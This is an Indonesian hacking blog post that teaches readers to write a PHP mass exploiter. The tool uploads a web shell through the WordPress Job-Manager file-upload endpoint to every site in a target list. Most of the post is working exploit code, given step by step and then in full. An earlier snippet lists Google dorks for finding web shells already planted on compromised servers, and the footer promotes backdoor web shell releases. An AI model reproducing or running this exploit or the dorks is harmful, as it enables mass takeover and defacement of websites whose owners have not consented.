Belajar Membuat Mass Exploiter Sederhana Dengan PHP

Dork "Dorking Shell" 100% Fresh 2016

Yeah, kali ini gw mau share google dork buat dorking shell yang mungkin masih fresh :v ini kek pengalaman gw dulu, liat dork di google kek gini inurl:"/b374k.php" nahh itu yang gw dapet kebanyakan fake shell, dan kalo di klik menu nya bakal ke http://www.shafou.com/ kan semvak -,-" okelah, langsung liat aja dork nya ^_^ intitle:"IndoXploit" filetype:php intitle:"IndoXploit" intext:"public_html" filetype:php intitle:"IndoXploit" intext:"mass deface" filetype:php intitle:"IndoXploit" intext:"mass delete" filetype:php intitle:"IndoXploit" intext:"jumping" filetype:php intitle:"IndoXploit" intext:"config" filetype:php intitle:"IndoXploit" intext:"config" filetype:php intitle:"IndoXploit" intext:"fake root" filetype:php intitle:"IndoXploit" intext:"auto edit user" filetype:php intitle:"IndoXploit"...

Hallo...
kali ini ane mau share gimana sih cara membuat Mass Exploiter dengan PHP.

Yang pertama buat sebuah file.php di direktori C:/xampp/php dan list.txt untuk target listnya, dan tentunya juga di direktori yang sama dengan file.php

Ini contoh ane buat Mass Exploiter WordPress Job-Manager.

Yang pertama, buat perintah untuk melakukan input yang digunakan untuk memasukkan list.txt dan shell.
echo "Masukkan List Anda : ";
$list = trim(fgets(STDIN));
echo "Masukkan Shell Anda : ";
$shell = trim(fgets(STDIN));
Lalu masukkan script untuk membaca list.txt yang telah di inputkan
echo "Masukkan List Anda : ";
$list = trim(fgets(STDIN));
echo "Masukkan Shell Anda : ";
$shell = trim(fgets(STDIN));

$open = fopen($list,"r"); //membuka list.txt untuk dibaca
$size = filesize($list); //berapa ukuran list.txt
$read = fread($open,$size); //membaca list.txt
$target = explode("\r\n",$read); //memecah list.txt berdasarkan \n atau enter

foreach($target as $targets){ //untuk mengeksekusi satu satu list.txt yang sudah dipecah tadi
}
Sekarang buat perintah curl untuk melakukan post kepada target yang berada di list.txt
echo "Masukkan List Anda : ";
$list = trim(fgets(STDIN));
echo "Masukkan Shell Anda : ";
$shell = trim(fgets(STDIN));

$open = fopen($list,"r"); //membuka list.txt untuk dibaca
$size = filesize($list); //berapa ukuran list.txt
$read = fread($open,$size); //membaca list.txt
$target = explode("\r\n",$read); //memecah list.txt berdasarkan \n atau enter

foreach($target as $targets){ //untuk mengeksekusi satu satu list.txt yang sudah dipecah tadi

$targetvuln = "$targets/jm-ajax/upload_file"; //menambahkan exploit pada target

$ch = curl_init(); //pembukaan curl
curl_setopt($ch, CURLOPT_URL, $targetvuln); //melakukan post pada $targetvuln atau target yang sudah diberi exploit
curl_setopt($ch, CURLOPT_POST, 1); //memberi nilai 1 atau TRUE pada post agar bisa melakukan post
curl_setopt($ch, CURLOPT_POSTFIELDS, array("files[]" => "@$shell")); //melakukan post $shell pada array files[]
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //mengembalikan informasi yang diperoleh dalam bentuk file streaming, bukannya output
Sekarang tinggal memasukkan perintah atau script eksekusi curl agar melakukan post,
$hajar = curl_exec($ch); //mengeksekusi query curl bernama $ch
if($hajar){
echo "sukses\n$targets/wp-content/uploads/job-manager-uploads/files/2017/10/$shell\n"; //untuk output sukses dan path/letak shellnya
}else{
echo "gagal\n";
}
Jadi script full exploiternya seperti ini.
<?php
echo "Masukkan List Anda : ";
$list = trim(fgets(STDIN));
echo "Masukkan Shell Anda : ";
$shell = trim(fgets(STDIN));

$open = fopen($list,"r"); //membuka list.txt untuk dibaca
$size = filesize($list); //berapa ukuran list.txt
$read = fread($open,$size); //membaca list.txt
$target = explode("\r\n",$read); //memecah list.txt berdasarkan \n atau enter

foreach($target as $targets){ //untuk mengeksekusi satu satu list.txt yang sudah dipecah tadi

    echo "\n\nScanning $targets => ";

    $targetvuln = "$targets/jm-ajax/upload_file"; //menambahkan exploit pada target

    $ch = curl_init(); //pembukaan curl
    curl_setopt($ch, CURLOPT_URL, $targetvuln); //melakukan post pada $targetvuln atau target yang sudah diberi exploit
    curl_setopt($ch, CURLOPT_POST, 1); //memberi nilai 1 atau TRUE pada post agar bisa melakukan post
    curl_setopt($ch, CURLOPT_POSTFIELDS, array("files[]" => "@$shell")); //melakukan post $shell pada array files[]
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //mengembalikan informasi yang diperoleh dalam bentuk file streaming, bukannya output

    $hajar = curl_exec($ch); //mengeksekusi query curl bernama $ch
    if($hajar){
        echo "sukses\n$targets/wp-content/uploads/job-manager-uploads/files/2017/10/$shell\n"; //untuk output sukses dan path/letak shellnya
    }else{
        echo "gagal\n";
    }
}
?>
Untuk menjalankannya tinggal memasukkan perintah php nama_exploiter.php
baca juga : Cara Menjalankan Xploiter PHP di Windows

nb * list.txt kalian isi dengan list target kalian

Oke sekian dulu tutorial hari ini, semoga dapat menambah ilmu sobat sobat dalam belajar.
Jika ada yang tidak tau/bingung bisa langsung komentar dibawah ^_^ Terimakasih sudah berkunjung ^_^ .

Special Thanks : PETR03X - FRU_403 - Comod0x - SCYTHE404_LOL - Grav3 - ShinChan

BLOG-N45HT

Popular

[RELEASE] Terserah Shell Backdoor - Recoded by Mr.x0x

OJS Shell Finder

Dork "Dorking Shell" 100% Fresh 2016

[RELEASE] Noesantara BlackhHat WebShell - recoded by Mr.x0x